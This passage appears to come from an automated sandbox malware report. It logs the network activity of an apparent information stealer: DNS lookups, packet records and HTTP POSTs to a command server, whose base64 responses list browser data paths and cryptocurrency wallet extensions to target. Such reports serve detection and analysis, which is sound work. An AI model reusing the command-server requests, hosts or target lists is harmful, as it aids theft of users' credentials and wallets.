                                                      Aug 29, 2024 22:52:39.760937929 CEST49745443192.168.2.4188.114.96.3
                                                      Aug 29, 2024 22:52:39.760951042 CEST44349745188.114.96.3192.168.2.4
                                                      Aug 29, 2024 22:52:40.279454947 CEST44349745188.114.96.3192.168.2.4
                                                      Aug 29, 2024 22:52:40.279529095 CEST49745443192.168.2.4188.114.96.3
                                                      Aug 29, 2024 22:52:40.312663078 CEST49745443192.168.2.4188.114.96.3
                                                      Aug 29, 2024 22:52:40.312675953 CEST44349745188.114.96.3192.168.2.4
                                                      Aug 29, 2024 22:52:40.312910080 CEST44349745188.114.96.3192.168.2.4
                                                      Aug 29, 2024 22:52:40.315562963 CEST49745443192.168.2.4188.114.96.3
                                                      Aug 29, 2024 22:52:40.315680981 CEST49745443192.168.2.4188.114.96.3
                                                      Aug 29, 2024 22:52:40.315704107 CEST44349745188.114.96.3192.168.2.4
                                                      Aug 29, 2024 22:52:40.804208040 CEST804974495.164.119.162192.168.2.4
                                                      Aug 29, 2024 22:52:40.804435015 CEST4974480192.168.2.495.164.119.162
                                                      Aug 29, 2024 22:52:40.804546118 CEST4974480192.168.2.495.164.119.162
                                                      Aug 29, 2024 22:52:40.809585094 CEST804974495.164.119.162192.168.2.4
                                                      Aug 29, 2024 22:52:40.814790010 CEST44349745188.114.96.3192.168.2.4
                                                      Aug 29, 2024 22:52:40.814898968 CEST44349745188.114.96.3192.168.2.4
                                                      Aug 29, 2024 22:52:40.814939976 CEST49745443192.168.2.4188.114.96.3
                                                      Aug 29, 2024 22:52:40.815149069 CEST49745443192.168.2.4188.114.96.3
                                                      Aug 29, 2024 22:52:40.815162897 CEST44349745188.114.96.3192.168.2.4
                                                      Aug 29, 2024 22:52:40.815172911 CEST49745443192.168.2.4188.114.96.3
                                                      Aug 29, 2024 22:52:40.815177917 CEST44349745188.114.96.3192.168.2.4
                                                      Aug 29, 2024 22:52:45.272869110 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:45.277268887 CEST4974080192.168.2.4147.45.44.104
                                                      Aug 29, 2024 22:53:01.655620098 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:01.661211967 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:01.661392927 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:01.661441088 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:01.666888952 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:02.579818010 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:02.579900026 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:02.582377911 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:02.588460922 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:03.124488115 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:03.124563932 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:03.270740986 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:03.280690908 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:03.813849926 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:03.813894033 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:03.813915968 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:03.813942909 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:03.903203964 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:03.903261900 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:03.904429913 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:03.909372091 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:04.443942070 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:04.444003105 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:04.444045067 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:04.444083929 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:04.451523066 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:04.451536894 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:04.451591015 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:04.451603889 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:04.530597925 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:04.530678034 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:04.532038927 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:04.539186954 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:05.274430037 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:05.274493933 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:05.333398104 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:05.333420038 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:05.339056969 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:05.339078903 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:05.339088917 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:05.339098930 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:05.339901924 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:05.339911938 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:05.339919090 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:06.000927925 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:06.001013041 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:06.051691055 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:06.051706076 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:06.056617022 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:06.056633949 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:06.056679964 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:06.056689978 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:06.056797981 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:06.588227987 CEST8049751147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:53:06.589468956 CEST4975180192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:53:07.687521935 CEST4975180192.168.2.4147.45.68.138

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Aug 29, 2024 22:52:36.606887102 CEST5657653192.168.2.41.1.1.1
                                                      Aug 29, 2024 22:52:36.622071981 CEST53565761.1.1.1192.168.2.4
                                                      Aug 29, 2024 22:52:37.972831011 CEST5577553192.168.2.41.1.1.1
                                                      Aug 29, 2024 22:52:37.989464045 CEST53557751.1.1.1192.168.2.4
                                                      Aug 29, 2024 22:52:38.882446051 CEST5409353192.168.2.41.1.1.1
                                                      Aug 29, 2024 22:52:38.934042931 CEST6414753192.168.2.41.1.1.1
                                                      Aug 29, 2024 22:52:38.947849989 CEST53641471.1.1.1192.168.2.4
                                                      Aug 29, 2024 22:52:39.154412031 CEST53540931.1.1.1192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Aug 29, 2024 22:52:36.606887102 CEST192.168.2.41.1.1.10xb050Standard query (0)awwardwiqi.shopA (IP address)IN (0x0001)false
                                                      Aug 29, 2024 22:52:37.972831011 CEST192.168.2.41.1.1.10x8139Standard query (0)locatedblsoqp.shopA (IP address)IN (0x0001)false
                                                      Aug 29, 2024 22:52:38.882446051 CEST192.168.2.41.1.1.10xdc36Standard query (0)stadiatechnologies.comA (IP address)IN (0x0001)false
                                                      Aug 29, 2024 22:52:38.934042931 CEST192.168.2.41.1.1.10x9925Standard query (0)traineiwnqo.shopA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Aug 29, 2024 22:52:36.622071981 CEST1.1.1.1192.168.2.40xb050No error (0)awwardwiqi.shop188.114.97.3A (IP address)IN (0x0001)false
                                                      Aug 29, 2024 22:52:36.622071981 CEST1.1.1.1192.168.2.40xb050No error (0)awwardwiqi.shop188.114.96.3A (IP address)IN (0x0001)false
                                                      Aug 29, 2024 22:52:37.989464045 CEST1.1.1.1192.168.2.40x8139No error (0)locatedblsoqp.shop188.114.97.3A (IP address)IN (0x0001)false
                                                      Aug 29, 2024 22:52:37.989464045 CEST1.1.1.1192.168.2.40x8139No error (0)locatedblsoqp.shop188.114.96.3A (IP address)IN (0x0001)false
                                                      Aug 29, 2024 22:52:38.947849989 CEST1.1.1.1192.168.2.40x9925No error (0)traineiwnqo.shop188.114.96.3A (IP address)IN (0x0001)false
                                                      Aug 29, 2024 22:52:38.947849989 CEST1.1.1.1192.168.2.40x9925No error (0)traineiwnqo.shop188.114.97.3A (IP address)IN (0x0001)false
                                                      Aug 29, 2024 22:52:39.154412031 CEST1.1.1.1192.168.2.40xdc36No error (0)stadiatechnologies.com95.164.119.162A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • awwardwiqi.shop
                                                      • locatedblsoqp.shop
                                                      • traineiwnqo.shop
                                                      • 147.45.68.138
                                                      • 147.45.44.104
                                                      • stadiatechnologies.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449739147.45.68.138804960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 29, 2024 22:52:16.223634005 CEST88OUTGET / HTTP/1.1
                                                      Host: 147.45.68.138
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Aug 29, 2024 22:52:17.133261919 CEST168INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:17 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0
                                                      Aug 29, 2024 22:52:17.154110909 CEST436OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----GDAECAECFCAAEBFHIEHD
                                                      Host: 147.45.68.138
                                                      Content-Length: 256
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 35 37 31 39 37 39 41 44 45 32 33 39 32 34 36 39 36 33 33 30 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 2d 2d 0d 0a
                                                      Data Ascii: ------GDAECAECFCAAEBFHIEHDContent-Disposition: form-data; name="hwid"C4571979ADE23924696330-a33c7340-61ca------GDAECAECFCAAEBFHIEHDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GDAECAECFCAAEBFHIEHD--
                                                      Aug 29, 2024 22:52:17.692980051 CEST232INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:17 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 3a1|1|1|1|bc14f24da94d78e47f386611390bdd56|1|1|1|0|0|50000|10
                                                      Aug 29, 2024 22:52:17.694446087 CEST511OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHID
                                                      Host: 147.45.68.138
                                                      Content-Length: 331
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 2d 2d 0d 0a
                                                      Data Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="mode"1------GHJKJDAKEHJDGDGDGHID--
                                                      Aug 29, 2024 22:52:18.234009981 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:18 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 5a 70 64 6d 46 73 5a 47 6c 38 58 46 5a 70 64 6d 46 73 5a 47 6c 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 44 62 32 31 76 5a 47 38 67 52 48 4a 68 5a 32 39 75 66 46 78 44 62 [TRUNCATED]
                                                      Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIERhdGF8Y2hyb21lfFZpdmFsZGl8XFZpdmFsZGlcVXNlciBEYXRhfGNocm9tZXxDb21vZG8gRHJhZ29ufFxDb21vZG9cRHJhZ29uXFVzZXIgRGF0YXxjaHJvbWV8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfENvY0NvY3xcQ29jQ29jXEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxCcmF2ZXxcQnJhdmVTb2Z0d2FyZVxCcmF2ZS1Ccm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8Q2VudCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZXxcTWljcm9zb2Z0XEVkZ2VcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZSBDYW5hcnl8XE1pY3Jvc29mdFxFZGdlIFN4U1xVc2VyIERhdGF8Y2hyb21lfE1pY3Jvc29mdCBFZGdlIEJldGF8XE1pY3Jvc29mdFxFZGdlIEJldGFcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZSBEZXZ8XE1pY3Jvc29mdFxFZGdlIERldlxVc2V [TRUNCATED]
                                                      Aug 29, 2024 22:52:18.234457016 CEST486INData Raw: 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 52 55 55 4a 79 62 33 64 7a 5a 58 4a 38 58 46 52 6c 62 6d 4e 6c 62 6e 52 63 55 56 46 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57
                                                      Data Ascii: VXNlciBEYXRhfGNocm9tZXxRUUJyb3dzZXJ8XFRlbmNlbnRcUVFCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8Q3J5cHRvVGFiIEJyb3dzZXJ8XENyeXB0b1RhYiBCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8T3BlcmF8XE9wZXJhIFNvZnR3YXJlfG9wZXJhfE9wZXJhIEdYfFxPcGVyYSBTb2Z0d2FyZXxvcGVyYXxPcGVyYSB
                                                      Aug 29, 2024 22:52:18.320589066 CEST5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0
                                                      Aug 29, 2024 22:52:18.321846962 CEST511OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCA
                                                      Host: 147.45.68.138
                                                      Content-Length: 331
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 2d 2d 0d 0a
                                                      Data Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="mode"2------DHIEBAAKJDHIECAAFHCA--
                                                      Aug 29, 2024 22:52:18.878807068 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:18 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 32 6c 6f 62 32 5a 6c 59 33 77 78 66 44 42 38 4d 48 78 43 61 57 35 68 62 6d 4e 6c 51 32 68 68 61 57 35 58 59 57 78 73 5a 58 52 38 4d 58 78 6d 61 47 4a 76 61 47 6c 74 59 57 56 73 59 6d 39 6f 63 47 70 69 59 6d 78 6b 59 32 35 6e 59 32 35 68 63 47 35 6b [TRUNCATED]
                                                      Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3wxfDB8MHxCaW5hbmNlQ2hhaW5XYWxsZXR8MXxmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHwxfDF8MHxZb3JvaXwxfGZmbmJlbGZkb2Vpb2hlbmtqaWJubWFkamllaGpoYWpifDF8MHwwfENvaW5iYXNlfDF8aG5mYW5rbm9jZmVvZmJkZGdjaWpubWhuZm5rZG5hYWR8MXwwfDF8R3VhcmRhfDF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDF8aVdhbGxldHwxfGtuY2NoZGlnb2JnaGVuYmJhZGRvampubmFvZ2ZwcGZqfDF8MHwwfFJvbmluV2FsbGV0fDF8Zm5qaG1raGhta2Jqa2thYm5kY25ub2dhZ29nYm5lZWN8MXwwfDB8TmVvTGluZXwxfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENsb3ZlcldhbGxldHwxfG5obmtia2dqaWtnY2lnYWRvbWtwaGFsYW5uZGNhcGprfDF8MHwwfExpcXVhbGl0eVdhbGxldHwxfGtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufDF8MHwwfFRlcnJhX1N0YXRpb258MXxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnwxfGRta2FtY2tub2drZ2NkZmhoYmRkY2doYW [TRUNCATED]
                                                      Aug 29, 2024 22:52:18.878822088 CEST1236INData Raw: 6b 63 47 52 74 61 32 46 68 61 32 56 71 62 6d 68 68 5a 58 77 78 66 44 42 38 4d 48 78 51 62 32 78 35 62 57 56 7a 61 46 64 68 62 47 78 6c 64 48 77 78 66 47 70 76 61 6d 68 6d 5a 57 39 6c 5a 47 74 77 61 32 64 73 59 6d 5a 70 62 57 52 6d 59 57 4a 77 5a
                                                      Data Ascii: kcGRta2Fha2VqbmhhZXwxfDB8MHxQb2x5bWVzaFdhbGxldHwxfGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHwxfGZscGljaWlsZW1naGJtZmFsaWNham9vbGhra2VuZmVsfDF8MHwwfENvaW45OHwxfGFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfDF8MHwwfEVWRVIgV2FsbG
                                                      Aug 29, 2024 22:52:18.878830910 CEST128INData Raw: 76 59 57 52 6b 61 57 35 77 61 32 4a 68 61 58 77 78 66 44 46 38 4d 48 78 48 51 58 56 30 61 43 42 42 64 58 52 6f 5a 57 35 30 61 57 4e 68 64 47 39 79 66 44 42 38 61 57 78 6e 59 32 35 6f 5a 57 78 77 59 32 68 75 59 32 56 6c 61 58 42 70 63 47 6c 71 59
                                                      Data Ascii: vYWRkaW5wa2JhaXwxfDF8MHxHQXV0aCBBdXRoZW50aWNhdG9yfDB8aWxnY25oZWxwY2huY2VlaXBpcGlqYWxqa2JsYmNvYmx8MXwxfDF8VHJvbml1bXwxfHBubmRwbGN
                                                      Aug 29, 2024 22:52:18.883162022 CEST1236INData Raw: 69 61 32 46 72 59 33 42 73 61 32 70 75 62 32 78 6e 59 6d 74 6b 5a 32 70 70 61 32 70 6c 5a 47 35 74 66 44 46 38 4d 48 77 77 66 46 52 79 64 58 4e 30 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 56 6e 61 6d 6c 6b 61 6d 4a 77 5a 32 78 70 59 32 68 6b 59
                                                      Data Ascii: ia2FrY3Bsa2pub2xnYmtkZ2ppa2plZG5tfDF8MHwwfFRydXN0IFdhbGxldHwxfGVnamlkamJwZ2xpY2hkY29uZGJjYmRuYmVlcHBnZHBofDF8MHwwfEV4b2R1cyBXZWIzIFdhbGxldHwxfGFob2xwZmRpYWxqZ2pmaG9taWhramJtZ2ppZGxjZG5vfDF8MHwwfEJyYWF2b3N8MXxqbmxnYW1lY2JwbWJhampmaG1tbWxoZWprZW
                                                      Aug 29, 2024 22:52:18.883183956 CEST1236INData Raw: 73 62 32 6c 71 59 6e 42 76 62 47 56 70 59 57 31 68 66 44 46 38 4d 48 77 77 66 45 35 70 5a 32 68 30 62 48 6c 38 4d 58 78 6d 61 57 6c 72 62 32 31 74 5a 47 52 69 5a 57 4e 6a 59 57 39 70 59 32 39 6c 61 6d 39 75 61 57 46 74 62 57 35 68 62 47 74 6d 59
